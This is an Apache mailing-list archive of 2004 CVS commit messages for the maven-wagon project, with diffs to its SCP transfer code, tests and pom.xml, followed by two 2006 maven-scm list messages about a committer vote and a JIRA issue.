1.10 retrieving revision 1.11 diff -u -r1.10 -r1.11 --- WagonTestCase.java 20 Jun 2004 15:25:28 -0000 1.10 +++ WagonTestCase.java 29 Jun 2004 18:14:28 -0000 1.11 @@ -200,7 +200,7 @@ protected void putFile() throws Exception { - message( "Putting test artifact into test repository " + testRepository ); + message( "Putting test artifact: " + resource + " into test repository " + testRepository ); Wagon wagon = getWagon(); 1.5 +2 -9 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java Index: WagonUtils.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- WagonUtils.java 19 Jun 2004 14:16:21 -0000 1.4 +++ WagonUtils.java 29 Jun 2004 18:14:28 -0000 1.5 @@ -115,13 +115,9 @@ while ( !queue.isEmpty() ) { - String path = ( String ) queue.removeFirst(); - - File currentDir = new File ( dir, path); - - System.out.println( "Processing dir: " + currentDir ); + File currentDir = new File ( dir, path ); File[] files = currentDir.listFiles(); @@ -129,8 +125,6 @@ { File file = files[i]; - System.out.println( "Processing file: " + file ); - String resource; if ( path.length() > 0 ) @@ -140,7 +134,6 @@ else { resource = file.getName(); - } if ( file.isDirectory() ) --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 29 18:45:56 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77318 invoked from network); 29 Jun 2004 18:45:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Jun 2004 18:45:54 -0000 Received: (qmail 54468 invoked by uid 500); 29 Jun 2004 18:44:59 -0000 Delivered-To: [email protected] Received: (qmail 54301 invoked by uid 500); 29 Jun 2004 18:44:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 54038 invoked by uid 99); 29 Jun 2004 18:44:54 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 29 Jun 2004 11:44:54 -0700 Received: (qmail 75429 invoked by uid 1668); 29 Jun 2004 18:44:41 -0000 Date: 29 Jun 2004 18:44:41 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh ScpWagonTest.java ScpWagonWithSshPrivateKeySearchTest.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/29 11:44:41 Modified: wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh ScpWagonTest.java ScpWagonWithSshPrivateKeySearchTest.java Log: SCP Wagon works now Revision Changes Path 1.11 +128 -62 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java Index: ScpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java,v retrieving revision 1.10 retrieving revision 1.11 diff -u -r1.10 -r1.11 --- ScpWagon.java 25 Jun 2004 18:43:27 -0000 1.10 +++ ScpWagon.java 29 Jun 2004 18:44:41 -0000 1.11 @@ -29,6 +29,7 @@ import org.apache.maven.wagon.ResourceDoesNotExistException; import org.apache.maven.wagon.TransferFailedException; import org.apache.maven.wagon.WagonConstants; +import org.apache.maven.wagon.events.TransferEvent; import org.apache.maven.wagon.artifact.Artifact; import org.apache.maven.wagon.authentication.AuthenticationException; import org.apache.maven.wagon.authentication.AuthenticationInfo; @@ -49,12 +50,11 @@ * <p/> * We will first try to use public keys for authentication and if that doesn't * work then we fall back to using the login and password - * - * @version $Id$ * + * @version $Id$ */ public class ScpWagon - extends AbstractWagon implements SshCommandExecutor + extends AbstractWagon implements SshCommandExecutor { public static String EXEC_CHANNEL = "exec"; @@ -69,7 +69,7 @@ // ---------------------------------------------------------------------- public void openConnection() - throws AuthenticationException + throws AuthenticationException { try { @@ -108,7 +108,9 @@ { if ( authInfo.getPassphrase() == null ) { - authInfo.setPassphrase( "" ); + String msg = "Private key provided " + "without passphrase for repo: " + getRepository().getName(); + + throw new AuthenticationException( msg ); } fireSessionDebug( "Using private key: " + privateKey ); @@ -122,7 +124,6 @@ throw new AuthenticationException( msg ); } - ProxyInfo proxyInfo = getRepository().getProxyInfo(); if ( proxyInfo != null && proxyInfo.getHost() != null ) @@ -137,14 +138,14 @@ if ( proxyPort == SOCKS5_PROXY_PORT ) { proxy = new ProxySOCKS5( proxyInfo.getHost() ); - ( (ProxySOCKS5) proxy ).setUserPasswd( proxyInfo.getUserName(), - proxyInfo.getPassword() ); + ( ( ProxySOCKS5 ) proxy ).setUserPasswd( proxyInfo.getUserName(), + proxyInfo.getPassword() ); } else { proxy = new ProxyHTTP( proxyInfo.getHost(), proxyPort ); - ( (ProxyHTTP) proxy ).setUserPasswd( proxyInfo.getUserName(), - proxyInfo.getPassword() ); + ( ( ProxyHTTP ) proxy ).setUserPasswd( proxyInfo.getUserName(), + proxyInfo.getPassword() ); } proxy.connect( session, host, port ); @@ -187,19 +188,21 @@ // // ---------------------------------------------------------------------- - public void closeConnection() + public void closeConnection() { session.disconnect(); } public void executeCommand( String command ) - throws TransferFailedException + throws TransferFailedException { ChannelExec channel = null; try { - channel = (ChannelExec) session.openChannel( EXEC_CHANNEL ); + fireTransferDebug( "Executing command: " + command ); + + channel = ( ChannelExec ) session.openChannel( EXEC_CHANNEL ); channel.setCommand( command ); @@ -217,17 +220,27 @@ public void put( File source, Artifact artifact ) - throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException + throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException { put( source, fullArtifactPath( artifact ) ); } public void put( File source, String resource ) - throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException + throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException { - String mkdirCmd = "mkdir -p " + getRepository().getBasedir() + "/" + PathUtils.dirname( resource ) + "\n"; - executeCommand( mkdirCmd ); + String chdirCmd = "cd " + getRepository().getBasedir() + "\n"; + + executeCommand( chdirCmd ); + + String dir = PathUtils.dirname( resource ); + + if ( dir != null && dir.length() > 0) + { + String mkdirCmd = "mkdir -p " + dir + "\n"; + + executeCommand( mkdirCmd ); + } ChannelExec channel = null; @@ -243,7 +256,7 @@ fireTransferDebug( "Executing command: " + command ); - channel = (ChannelExec) session.openChannel( EXEC_CHANNEL ); + channel = ( ChannelExec ) session.openChannel( EXEC_CHANNEL ); channel.setCommand( command ); @@ -254,7 +267,7 @@ channel.connect(); - byte[] tmp = new byte[1]; + byte[] tmp = new byte[ 1 ]; if ( checkAck( in ) != 0 ) { @@ -286,23 +299,12 @@ // send a content of lfile FileInputStream fis = new FileInputStream( source ); - putTransfer( resource, source, fis, out, false ); + putTransfer( resource, source, fis, out, false ); - byte[] buf = new byte[1024]; -// -// while ( true ) -// { -// int len = fis.read( buf, 0, buf.length ); -// -// if ( len <= 0 ) break; -// -// out.write( buf, 0, len ); -// -// out.flush(); -// } + byte[] buf = new byte[ 1024 ]; // send '\0' - buf[0] = 0; + buf[ 0 ] = 0; out.write( buf, 0, 1 ); @@ -318,7 +320,7 @@ throw new TransferFailedException( msg ); } } - catch ( Exception e ) + catch ( Exception e ) { String msg = "Error occured while deploying '" + resource + "' to remote repository: " + getRepository().getUrl(); @@ -346,13 +348,13 @@ } public void get( Artifact artifact, File destination ) - throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException + throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException { get( fullArtifactPath( artifact ), destination ); } public void get( String resource, File destination ) - throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException + throws TransferFailedException, ResourceDoesNotExistException, AuthorizationException { ChannelExec channel = null; @@ -361,13 +363,16 @@ InputStream in = null; + + LazyFileOutputStream outputStream = new LazyFileOutputStream( destination ); + try { String cmd = "scp -f " + resource; fireTransferDebug( "Executing command: " + cmd ); - channel = (ChannelExec) session.openChannel( EXEC_CHANNEL ); + channel = ( ChannelExec ) session.openChannel( EXEC_CHANNEL ); channel.setCommand( cmd ); @@ -378,10 +383,10 @@ channel.connect(); - byte[] buf = new byte[1024]; + byte[] buf = new byte[ 1024 ]; // send '\0' - buf[0] = 0; + buf[ 0 ] = 0; out.write( buf, 0, 1 ); @@ -405,48 +410,101 @@ { in.read( buf, 0, 1 ); - if ( buf[0] == ' ' ) break; + if ( buf[ 0 ] == ' ' ) + { + break; + } - filesize = filesize * 10 + ( buf[0] - '0' ); + filesize = filesize * 10 + ( buf[ 0 ] - '0' ); } - String file = null; for ( int i = 0; ; i++ ) { in.read( buf, i, 1 ); - if ( buf[i] == (byte) 0x0a ) + if ( buf[ i ] == ( byte ) 0x0a ) { - file = new String( buf, 0, i ); - break; } } // send '\0' - buf[0] = 0; + buf[ 0 ] = 0; out.write( buf, 0, 1 ); out.flush(); - // read a content of lfile - LazyFileOutputStream outputStream = new LazyFileOutputStream( destination ); + fireGetStarted( resource, destination ); - getTransfer( resource, destination, in, outputStream); + TransferEvent transferEvent = new TransferEvent( this, resource, TransferEvent.TRANSFER_PROGRESS, TransferEvent.REQUEST_GET ); + try + { - byte[] tmp = new byte[1]; + while ( true ) + { + int len = Math.min( buf.length, filesize ); + + in.read( buf, 0, len ); + + outputStream.write( buf, 0, len ); + + transferEvent.setData( buf, len ); + + fireTransferProgress( transferEvent ); + + filesize -= len; + + if ( filesize == 0 ) + { + break; + } + } + } + catch ( IOException e ) + { + fireTransferError( resource, e ); + + shutdownStream( outputStream ); + + if ( destination.exists() ) + { + boolean deleted = destination.delete(); + + if ( !deleted ) + { + destination.deleteOnExit(); + } + } + + String msg = "GET request of: " + resource + " from " + source.getName() + "failed"; + + throw new TransferFailedException( msg, e ); + + } + + + fireGetCompleted( resource, destination ); if ( checkAck( in ) != 0 ) { + String msg = "Error occured while deploying '" + + resource + "' to remote repository '" + + getRepository().getUrl() + + "' - Wrong ACK "; + throw new TransferFailedException( msg ); } + else + { + fireTransferDebug( "ACK check: OK" ); + } // send '\0' - buf[0] = 0; + buf[ 0 ] = 0; out.write( buf, 0, 1 ); @@ -461,7 +519,7 @@ { boolean deleted = destination.delete(); - if ( ! deleted ) + if ( !deleted ) { destination.deleteOnExit(); } @@ -473,11 +531,10 @@ throw new TransferFailedException( msg, e ); - } finally { - if ( out != null) + if ( out != null ) { shutdownStream( out ); } @@ -485,6 +542,9 @@ { channel.disconnect(); } + + + shutdownStream( outputStream ); } } @@ -493,7 +553,7 @@ // ---------------------------------------------------------------------- public class WagonUserInfo - implements UserInfo + implements UserInfo { AuthenticationInfo authInfo; @@ -536,22 +596,28 @@ static int checkAck( InputStream in ) throws IOException { int b = in.read(); - // b may be 0 for success, - // 1 for error, - // 2 for fatal error, - // -1 +// b may be 0 for success, +// 1 for error, +// 2 for fatal error, +// -1 + + if ( b == 0 || b == -1 ) + { + return b; + } - if ( b == 0 ) return b; - if ( b == -1 ) return b; if ( b == 1 || b == 2 ) { StringBuffer sb = new StringBuffer(); + int c; + do { c = in.read(); - sb.append( (char) c ); + + sb.append( ( char ) c ); } while ( c != '\n' ); if ( b == 1 ) 1.4 +13 -4 maven-wagon/wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh/ScpWagonTest.java Index: ScpWagonTest.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh/ScpWagonTest.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- ScpWagonTest.java 21 May 2004 16:48:56 -0000 1.3 +++ ScpWagonTest.java 29 Jun 2004 18:44:41 -0000 1.4 @@ -41,14 +41,14 @@ protected String getTestRepositoryUrl() { - return "scp://login.ibiblio.org//public/html/maven"; + return "scp://beaver.codehaus.org//home/users/" + getUserName() + "/public_html"; } protected AuthenticationInfo getAuthInfo() { AuthenticationInfo authInfo = new AuthenticationInfo(); - String userName = System.getProperty( "user.name" ); + String userName = getUserName(); authInfo.setUserName( userName ); @@ -61,8 +61,17 @@ authInfo.setPassphrase( "" ); } - authInfo.setGroup( "maven" ); + authInfo.setGroup( getUserName() ); return authInfo; } + + + private String getUserName() + { + String userName = System.getProperty( "user.name" ); + + return userName; + } + } 1.4 +10 -4 maven-wagon/wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh/ScpWagonWithSshPrivateKeySearchTest.java Index: ScpWagonWithSshPrivateKeySearchTest.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/test/java/org/apache/maven/wagon/providers/ssh/ScpWagonWithSshPrivateKeySearchTest.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- ScpWagonWithSshPrivateKeySearchTest.java 21 May 2004 16:48:56 -0000 1.3 +++ ScpWagonWithSshPrivateKeySearchTest.java 29 Jun 2004 18:44:41 -0000 1.4 @@ -39,21 +39,27 @@ protected String getTestRepositoryUrl() { - return "scp://login.ibiblio.org//public/html/maven"; + return "scp://beaver.codehaus.org//home/users/" + getUserName() + "/public_html"; } protected AuthenticationInfo getAuthInfo() { AuthenticationInfo authInfo = new AuthenticationInfo(); - String userName = System.getProperty( "user.name" ); + String userName = getUserName(); authInfo.setUserName( userName ); authInfo.setPassphrase( "" ); - authInfo.setGroup( "maven" ); + authInfo.setGroup( getUserName() ); return authInfo; + } + + private String getUserName() + { + String userName = System.getProperty( "user.name" ); + return userName; } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 29 19:48:49 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23776 invoked from network); 29 Jun 2004 19:48:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Jun 2004 19:48:49 -0000 Received: (qmail 79665 invoked by uid 500); 29 Jun 2004 19:49:03 -0000 Delivered-To: [email protected] Received: (qmail 79641 invoked by uid 500); 29 Jun 2004 19:49:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 79626 invoked by uid 99); 29 Jun 2004 19:49:03 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 29 Jun 2004 12:49:02 -0700 Received: (qmail 23763 invoked by uid 1668); 29 Jun 2004 19:48:47 -0000 Date: 29 Jun 2004 19:48:47 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon pom.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/29 12:48:47 Modified: . pom.xml Log: making use of transitive dependecies Revision Changes Path 1.2 +5 -51 maven-wagon/pom.xml Index: pom.xml =================================================================== RCS file: /home/cvs/maven-wagon/pom.xml,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- pom.xml 9 Jun 2004 03:11:22 -0000 1.1 +++ pom.xml 29 Jun 2004 19:48:47 -0000 1.2 @@ -1,12 +1,12 @@ <?xml version="1.0" encoding="UTF-8"?> <project> - <pomVersion>3</pomVersion> + <pomVersion>4</pomVersion> <groupId>maven</groupId> - <artifactId>wagon</artifactId> + <artifactId>wagon</artifactId> + <version>0.9-SNAPSHOT</version> <name>Wagon</name> - <currentVersion>0.9-SNAPSHOT</currentVersion> - <description></description> + <description>Tools to manage artifacts and deployment</description> <shortDescription>Tools to manage artifacts and deployment</shortDescription> <package>org.apache.maven.wagon</package> <inceptionYear>2003</inceptionYear> @@ -19,7 +19,7 @@ <mailingLists> <mailingList> - <name>Wgaon User List</name> + <name>Wagon User List</name> <subscribe>[email protected]</subscribe> <unsubscribe>[email protected]</unsubscribe> <archive>http://[email protected]</archive> @@ -58,58 +58,12 @@ <artifactId>plexus</artifactId> <version>0.14-SNAPSHOT</version> </dependency> - <dependency> - <groupId>xpp3</groupId> - <artifactId>xpp3</artifactId> - <version>161.129.204.104</version> - </dependency> - <dependency> - <groupId>classworlds</groupId> - <artifactId>classworlds</artifactId> - <version>1.1-SNAPSHOT</version> - </dependency> - <dependency> - <groupId>xstream</groupId> - <artifactId>xstream</artifactId> - <version>1.0-SNAPSHOT</version> - </dependency> <!-- Testing --> <dependency> - <groupId>maven</groupId> - <artifactId>maven-model</artifactId> - <version>2.0-SNAPSHOT</version> - </dependency> - <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.8.1</version> </dependency> </dependencies> - - <build> - <sourceDirectory>src/main/java</sourceDirectory> - <unitTestSourceDirectory>src/test/java</unitTestSourceDirectory> - <unitTest> - <includes> - <include>**/*Test.java</include> - </includes> - <resources> - <resource> - <directory>src/test/resources</directory> - </resource> - <resource> - <directory>src/test/java</directory> - <includes> - <include>**/*.xml</include> - </includes> - </resource> - </resources> - </unitTest> - <resources> - <resource> - <directory>src/main/resources</directory> - </resource> - </resources> - </build> </project> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 30 17:20:06 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43887 invoked from network); 30 Jun 2004 17:20:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Jun 2004 17:20:06 -0000 Received: (qmail 28403 invoked by uid 500); 30 Jun 2004 17:20:04 -0000 Delivered-To: [email protected] Received: (qmail 28323 invoked by uid 500); 30 Jun 2004 17:20:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 28138 invoked by uid 99); 30 Jun 2004 17:19:59 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 30 Jun 2004 10:19:58 -0700 Received: (qmail 43697 invoked by uid 1668); 30 Jun 2004 17:19:45 -0000 Date: 30 Jun 2004 17:19:45 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon WagonUtils.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/30 10:19:45 Modified: wagon-api/src/main/java/org/apache/maven/wagon WagonUtils.java Log: quick hack to access auth info which will allow us to deploy artifacts Revision Changes Path 1.6 +34 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java Index: WagonUtils.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- WagonUtils.java 29 Jun 2004 18:14:28 -0000 1.5 +++ WagonUtils.java 30 Jun 2004 17:19:45 -0000 1.6 @@ -18,6 +18,7 @@ */ import org.apache.maven.wagon.authorization.AuthorizationException; +import org.apache.maven.wagon.authentication.AuthenticationInfo; import org.codehaus.plexus.util.FileUtils; import java.io.File; @@ -150,5 +151,37 @@ } } + + public static AuthenticationInfo getAuthInfo() + { + AuthenticationInfo authInfo = new AuthenticationInfo(); + + String userName = getUserName(); + + authInfo.setUserName( userName ); + + File privateKey = new File( System.getProperty( "user.home" ), "/.ssh/id_dsa" ); + + if ( privateKey.exists() ) + { + authInfo.setPrivateKey( privateKey.getAbsolutePath() ); + + authInfo.setPassphrase( "" ); + } + + authInfo.setGroup( getUserName() ); + + return authInfo; + } + + + public static String getUserName() + { + String userName = System.getProperty( "user.name" ); + + return userName; + } + + } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 30 17:35:39 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50956 invoked from network); 30 Jun 2004 17:35:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Jun 2004 17:35:39 -0000 Received: (qmail 72139 invoked by uid 500); 30 Jun 2004 17:35:51 -0000 Delivered-To: [email protected] Received: (qmail 72119 invoked by uid 500); 30 Jun 2004 17:35:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 72098 invoked by uid 99); 30 Jun 2004 17:35:51 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 30 Jun 2004 10:35:51 -0700 Received: (qmail 50951 invoked by uid 1668); 30 Jun 2004 17:35:37 -0000 Date: 30 Jun 2004 17:35:37 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon pom.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/30 10:35:37 Modified: . pom.xml Log: added distributionManagement section Revision Changes Path 1.3 +9 -0 maven-wagon/pom.xml Index: pom.xml =================================================================== RCS file: /home/cvs/maven-wagon/pom.xml,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- pom.xml 29 Jun 2004 19:48:47 -0000 1.2 +++ pom.xml 30 Jun 2004 17:35:37 -0000 1.3 @@ -17,6 +17,15 @@ <logo>http://maven.apache.org/images/apache-maven-project.png</logo> </organization> + <distributionManagment> + <repository> + <id>central</id> + <name>Maven Central Repository at Ibiblio</name> + <url>scp://login.ibiblio.org//public/html/maven</url> + </repository> + </distributionManagment> + + <mailingLists> <mailingList> <name>Wagon User List</name> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 30 17:54:33 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58530 invoked from network); 30 Jun 2004 17:54:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Jun 2004 17:54:33 -0000 Received: (qmail 26221 invoked by uid 500); 30 Jun 2004 17:54:46 -0000 Delivered-To: [email protected] Received: (qmail 26203 invoked by uid 500); 30 Jun 2004 17:54:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 26165 invoked by uid 99); 30 Jun 2004 17:54:45 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 30 Jun 2004 10:54:44 -0700 Received: (qmail 58506 invoked by uid 1668); 30 Jun 2004 17:54:30 -0000 Date: 30 Jun 2004 17:54:30 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon pom.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/30 10:54:30 Modified: . pom.xml Log: fixed typo Revision Changes Path 1.4 +2 -2 maven-wagon/pom.xml Index: pom.xml =================================================================== RCS file: /home/cvs/maven-wagon/pom.xml,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- pom.xml 30 Jun 2004 17:35:37 -0000 1.3 +++ pom.xml 30 Jun 2004 17:54:30 -0000 1.4 @@ -17,13 +17,13 @@ <logo>http://maven.apache.org/images/apache-maven-project.png</logo> </organization> - <distributionManagment> + <distributionManagement> <repository> <id>central</id> <name>Maven Central Repository at Ibiblio</name> <url>scp://login.ibiblio.org//public/html/maven</url> </repository> - </distributionManagment> + </distributionManagement> <mailingLists> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Wed Mar 01 12:47:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32347 invoked from network); 1 Mar 2006 12:47:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 12:47:26 -0000 Received: (qmail 658 invoked by uid 500); 1 Mar 2006 12:48:12 -0000 Delivered-To: [email protected] Received: (qmail 641 invoked by uid 500); 1 Mar 2006 12:48:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 630 invoked by uid 99); 1 Mar 2006 12:48:12 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 04:48:12 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 01 Mar 2006 04:48:11 -0800 Received: (qmail 3120 invoked from network); 1 Mar 2006 12:47:53 -0000 Received: from 119.23.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 1 Mar 2006 12:47:53 -0000 Message-ID: <[email protected]> Date: Wed, 01 Mar 2006 13:47:44 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: "[email protected]" <[email protected]> Subject: [vote] Add =?ISO-8859-1?Q?Torbj=F8rn_Sm=F8rgrav_as_Maven-S?= =?ISO-8859-1?Q?CM_committer?= Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi I'd want to add Torbjørn Smørgrav as Maven-SCM committer. He's the maintainer of bazaar scm provider and have done a good work on it and TCK. He want to maintain it in next year (at least). Here my +1 Emmanuel From [email protected] Wed Mar 01 14:17:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88226 invoked from network); 1 Mar 2006 14:17:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:17:03 -0000 Received: (qmail 37956 invoked by uid 500); 1 Mar 2006 14:17:31 -0000 Delivered-To: [email protected] Received: (qmail 37876 invoked by uid 500); 1 Mar 2006 14:17:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 37459 invoked by uid 99); 1 Mar 2006 14:17:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:17:28 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:17:27 -0800 Received: (qmail 24658 invoked by uid 89); 1 Mar 2006 14:17:06 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 1 Mar 2006 14:17:06 -0000 Message-ID: <[email protected]> Date: Wed, 1 Mar 2006 08:17:06 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (SCM-165) PerforceChangeLogCommand needs to use the same clientspec as the update command In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-165?page=comments#action_59801 ] Emmanuel Venisse commented on SCM-165: -------------------------------------- Mike, we have 2 changelog plugins: - in maven-scm plugin that can be use for test - in mojo project, this plugin generate changelog reports and doc are online > 